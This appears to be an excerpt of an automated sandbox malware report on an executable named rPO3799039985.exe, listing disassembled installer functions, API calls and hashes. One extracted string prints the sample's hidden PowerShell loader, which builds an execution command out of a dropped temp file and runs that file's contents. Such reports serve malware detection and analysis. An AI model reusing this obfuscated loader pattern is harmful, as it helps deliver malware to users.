                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                          • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                                                                                                                                                          • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                                                                                                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                                                                                          • Opcode ID: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                                                                                                                          • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a67c8009aead4ab382489a98003fcdb5c23a57fc16a1888bff0d18b8c213c962
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                                                                                                                                                          Function 00404352 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(: Completed,Snik Setup: Completed), ref: 004044B9
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,: Completed), ref: 004044C5
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                                                                                                                            • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                                                                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                                                                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                                                                                                            • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                                                                                                            • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                                                                                                                            • Part of subcall function 00404709: lstrlenA.KERNEL32(Snik Setup: Completed,Snik Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                                                                                                            • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                                                                                                                            • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Snik Setup: Completed), ref: 004047C2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • : Completed, xrefs: 004044B3, 004044B8, 004044C3
                                                                                                                                                                                                          • powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040436B
                                                                                                                                                                                                          • Snik Setup: Completed, xrefs: 0040444F, 004044B2
                                                                                                                                                                                                          • A, xrefs: 00404475
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 004044A2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$Snik Setup: Completed$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 2624150263-2929229892
                                                                                                                                                                                                          • Opcode ID: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                                                                                                                          • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                                                                                                                          • Opcode Fuzzy Hash: defccd4cb28be1bf432bf86436ffe94b5e4a3bffcd77409c4071bec9b813e0ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                                                                                                                          Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 004055D1
                                                                                                                                                                                                          • \*.*, xrefs: 0040563C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                          • API String ID: 2035342205-545839243
                                                                                                                                                                                                          • Opcode ID: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                                                                                                                                                          • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa0479446002013ad939db2f63f2de5a2e45185ee36acd13474169775632d8f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                                                                                                                          Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 0040211D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen
                                                                                                                                                                                                          • API String ID: 123533781-468232566
                                                                                                                                                                                                          • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                                                                                                                          • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                                                                                                                          Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                          • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                                                                                                                          • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                                                                                                                          Function 004064CB Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                                          • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                                                                                                                                          Function 00406CA2 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                                                                                                          • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                                                                                                                                          Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040412B
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404258
                                                                                                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                          • String ID: (@@$: Completed$N$open
                                                                                                                                                                                                          • API String ID: 3615053054-1189687483
                                                                                                                                                                                                          • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                                                                                                          • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                                                                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
